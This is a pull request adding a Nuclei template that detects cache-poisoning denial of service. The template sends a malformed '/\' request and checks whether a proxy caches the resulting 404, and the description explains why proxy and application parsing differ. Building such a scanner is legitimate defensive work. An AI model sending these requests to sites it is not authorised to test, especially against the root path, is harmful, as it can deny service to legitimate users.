### PR TITLE
Added template cache-poisoning-dos

### DIFF
--- a/http/fuzzing/cache-poisoning-dos.yaml
+++ b/http/fuzzing/cache-poisoning-dos.yaml
@@ -1,0 +1,59 @@
+id: cache-poisoning
+
+info:
+  name: Cache Poisoning
+  author: Playtika ProdSec Team
+  severity: medium
+  description: This template detects DoS via Cache poisoning by sending a malformed request with an unsafe /\ (forward-slash and a back-slash) and then checks if web server poisons the cache with a 404.
+  tags: cache
+
+variables:
+  random: "{{rand_base(5)}}"
+  randomTwo: "{{rand_base(5)}}"
+
+flow: |
+  http(1) && http(2) && http(3)
+
+requests:
+  - raw:
+      - |+
+        GET /\?{{random}} HTTP/1.1
+        Host: {{Hostname}}
+
+    unsafe: true
+
+    matchers:
+      - type: status
+        status:
+          - 404
+        condition: and
+        internal: true
+
+
+  - raw:
+      - |+
+        GET /?{{random}} HTTP/1.1
+        Host: {{Hostname}}
+
+    unsafe: true
+
+    matchers:
+      - type: status
+        status:
+          - 404
+        condition: and
+        internal: true
+
+
+  - raw:
+      - |+
+        GET /?{{randomTwo}} HTTP/1.1
+        Host: {{Hostname}}
+
+    unsafe: true
+
+    matchers:
+      - type: status
+        status:
+          - 200
+        condition: and


### PR DESCRIPTION
### Template / PR Information

This template detects a cache poisoning DoS vulnerability where the browser sends a path with a forward slash followed by a back slash, causing inconsistent parsing between proxies and applications. The template sends an initial request with  a random parameter to avoid actually poisoning the real root of the application.

Steps:

The template sends a request with the path /\.
First Proxy Parsing: The first proxy interprets the path as / and passes it on to the application.

The application interprets the path as /\ and returns a 404 Not Found error.

The first proxy caches the 404 response for the path /.

Any subsequent requests to / hit the cache and receive the 404 error, causing a denial of service.
Impact: This results in legitimate users receiving a 404 error for the root path, effectively denying access to the service.


Impact: This results in legitimate users receiving a 404 error for the path /?random, effectively denying access to the service for that specific request.

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO




### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)